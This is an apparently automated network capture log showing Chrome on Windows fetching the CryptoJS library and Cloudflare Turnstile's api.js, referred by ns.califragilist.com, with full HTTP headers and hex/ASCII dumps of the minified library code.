                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:34 UTC954INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:34 GMT
                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                              ETag: W/"61182885-40eb"
                                                                                                                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                              Age: 878749
                                                                                                                                              Expires: Mon, 27 Oct 2025 15:55:34 GMT
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DT1yiS1L0lFLKnso6B95GPw2b6fxygQCrfbrJUuSBiI2mWiqCCG4yljYlNlZ0M%2FRULJpq7FFWCfzLYDeeX0w28XxZJp0MHVlLYgnIMAHxOZIGSA3v5HrrPtQYyhJqhf9PHyqqPGB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644c35aa07d5a-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:34 UTC415INData Raw: 37 62 66 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                              Data Ascii: 7bf7!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                              2024-11-06 15:55:34 UTC1369INData Raw: 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c
                                                                                                                                              Data Ascii: balThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||
                                                                                                                                              2024-11-06 15:55:34 UTC1369INData Raw: 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b
                                                                                                                                              Data Ascii: this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{
                                                                                                                                              2024-11-06 15:55:34 UTC1369INData Raw: 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f
                                                                                                                                              Data Ascii: t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o
                                                                                                                                              2024-11-06 15:55:34 UTC1369INData Raw: 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30
                                                                                                                                              Data Ascii: =this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0
                                                                                                                                              2024-11-06 15:55:34 UTC1369INData Raw: 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31
                                                                                                                                              Data Ascii: =0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>1
                                                                                                                                              2024-11-06 15:55:34 UTC1369INData Raw: 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69
                                                                                                                                              Data Ascii: yteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:functi
                                                                                                                                              2024-11-06 15:55:34 UTC1369INData Raw: 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55
                                                                                                                                              Data Ascii: (64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTU
                                                                                                                                              2024-11-06 15:55:34 UTC1369INData Raw: 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61
                                                                                                                                              Data Ascii: (t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._ha
                                                                                                                                              2024-11-06 15:55:34 UTC1369INData Raw: 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29
                                                                                                                                              Data Ascii: (m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50])


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              26192.168.2.1849775104.18.94.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:34 UTC652OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://ns.califragilist.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:34 UTC386INHTTP/1.1 302 Found
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:34 GMT
                                                                                                                                              Content-Length: 0
                                                                                                                                              Connection: close
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                              location: /turnstile/v0/b/22755d9a86c9/api.js
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644c35d92ddaf-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              27192.168.2.1849777104.18.94.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:34 UTC651OUTGET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://ns.califragilist.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:35 UTC471INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:35 GMT
                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                              Content-Length: 47672
                                                                                                                                              Connection: close
                                                                                                                                              accept-ranges: bytes
                                                                                                                                              last-modified: Mon, 28 Oct 2024 19:08:47 GMT
                                                                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644c7f9232ca9-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:35 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                              2024-11-06 15:55:35 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                                                                              Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,l=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                                                                              2024-11-06 15:55:35 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 66 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 66 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 66 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 66 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 66 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 66 3d 5b 66 5b 30 5d 26 32 2c 6c 2e 76 61 6c
                                                                                                                                              Data Ascii: ])}}function u(f){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,f[0]&&(n=0)),n;)try{if(o=1,c&&(l=f[0]&2?c.return:f[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,f[1])).done)return l;switch(c=0,l&&(f=[f[0]&2,l.val
                                                                                                                                              2024-11-06 15:55:35 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 77 6f 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e
                                                                                                                                              Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.FAILURE_WO_HAVING_TROUBLES="failure-wo-having-troubles",e.FAILURE_HAVIN
                                                                                                                                              2024-11-06 15:55:35 UTC1369INData Raw: 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 69 74 7c 7c 28 69 74 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 3d 22 66 61 69 6c 75 72 65 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 43 55 53 54 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22
